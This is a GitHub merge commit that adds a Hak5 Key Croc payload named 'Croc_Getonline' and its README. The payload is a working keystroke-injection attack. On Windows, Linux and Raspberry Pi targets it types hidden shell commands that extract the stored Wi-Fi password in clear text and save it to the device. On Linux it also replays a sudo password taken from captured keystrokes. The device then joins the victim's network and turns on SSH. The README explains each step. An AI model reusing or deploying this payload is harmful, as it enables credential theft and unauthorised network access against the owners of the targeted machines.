Merge pull request #58 from spywill/master

Croc_Getonline
pull/60/head
hak5glytch 2023-03-17 12:01:18 -05:00 committed by GitHub
commit 0ef3f8ae6d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 196 additions and 0 deletions

View File

@ -0,0 +1,118 @@
# Title: Croc_Getonline
# Description: Attempt to connect Keycroc automatically to target wifi access point
# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
# Author: spywill
# Version: 3.5
# Category: Key Croc
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
MATCH (getonline_W|getonline_R|getonline_L)
CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt
if [ -f $wifi_pass ]; then
cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
rm -f $wifi_pass
fi
ATTACKMODE HID STORAGE
Q DELAY 5000
LED ATTACK
case $LOOT in
getonline_W)
Q GUI r
Q DELAY 3000
Q STRING "powershell -NoP -NonI -W Hidden"
Q ENTER
Q DELAY 5000
Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
Q ENTER
Q DELAY 3000
Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
Q ENTER
Q DELAY 2000
Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
Q ENTER
Q DELAY 2000
Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
Q ENTER
Q DELAY 5000
Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
Q ENTER
;;
getonline_R)
Q CONTROL-ALT-d
Q CONTROL-ALT-t
Q DELAY 2000
Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
Q ENTER
Q DELAY 2000
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
Q ENTER
Q DELAY 2000
Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
Q ENTER
Q DELAY 2000
Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
Q ENTER
Q DELAY 3000
Q STRING "umount \$MOUNT_POINT ; exit"
Q ENTER
;;
getonline_L)
if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else
PC_PW=LINUX
fi
Q CONTROL-ALT-d
Q ALT-t
Q DELAY 2000
Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
Q ENTER
Q DELAY 2000
Q STRING "$PC_PW"
Q ENTER
Q DELAY 2000
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
Q ENTER
Q DELAY 2000
Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
Q ENTER
Q DELAY 2000
Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
Q ENTER
Q DELAY 3000
Q STRING "sudo umount \$MOUNT_POINT ; exit"
Q ENTER
;;
esac
ATTACKMODE HID
sleep 3
LED SETUP
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
ifconfig wlan0 down
if [ "$LOOT" = "getonline_W" ]; then
sed -i '0,/./s/^.//' $wifi_pass
sed -i 's/\r//g' $wifi_pass
fi
sed -i 's/\( \)*/\1/g' $wifi_pass
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
ifconfig wlan0 up
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
sleep 3
systemctl restart ssh.service
[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
sleep 3
LED OFF

View File

@ -0,0 +1,78 @@
# Croc_Getonline
## INTRODUCTION :
- This project is developed for the HAK5 KeyCroc
- Attempt to connect Keycroc automatically to target wifi access point.
* **TESTED ON**
- Windows 10
- Raspberry pi 4 (bullseye image)
- linux (parrot os)
## INSTALLATION :
- Enter arming mode on your keycroc to install file.
- Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**
## STARTING GETONLINE :
- After install plug into target and type in anywhere
- **getonline_W** <-- MATCH word for windows
- **getonline_L** <-- MATCH word for Linux
- **getonline_R** <-- MATCH word for Raspberry pi
- When the payload is done running the LED will light up green
- Keycroc should now be connected to target wifi access point
- NOTE: for linux edit payload for passwd needed for sudo permission
## PAYLOAD INFO :
**PowerShell script that performs the following actions:**
Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet.
Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet.
Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT.
Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script.
**Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc.
Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID.
Gets the password for the current wireless network by searching for the SSID in the /etc/wpa_supplicant/wpa_supplicant.conf file and extracting the password using sed.
Writes the SSID and password to a file located at $MOUNT_POINT using tee.
Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
**Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb.
Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist.
Mounts the volume with the label "KeyCroc" to the mount point directory using the mount command with the -L flag to specify the label of the volume to be mounted.
Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID.
Gets the password for the current wireless network by searching for the SSID in the /etc/NetworkManager/system-connections/ directory and extracting the password using grep and sed.
Writes the SSID and password to a file located at $MOUNT_POINT using tee with sudo to obtain elevated privileges.
Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc".
**-Sed command that performs the following actions:**
By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus:
1{x;s#^#sed -n 1p wifipass.txt#e;x}
1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s
x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space.
s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only.
x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space.
10{G;s/\n(\S+).*/ \1/}
10{..} executes the commands between the ellipses on the tenth line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator.
s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column.
11{G;s/\n\S+//}
11{..} executes the commands between the ellipses on the eleventh line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator.
s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column.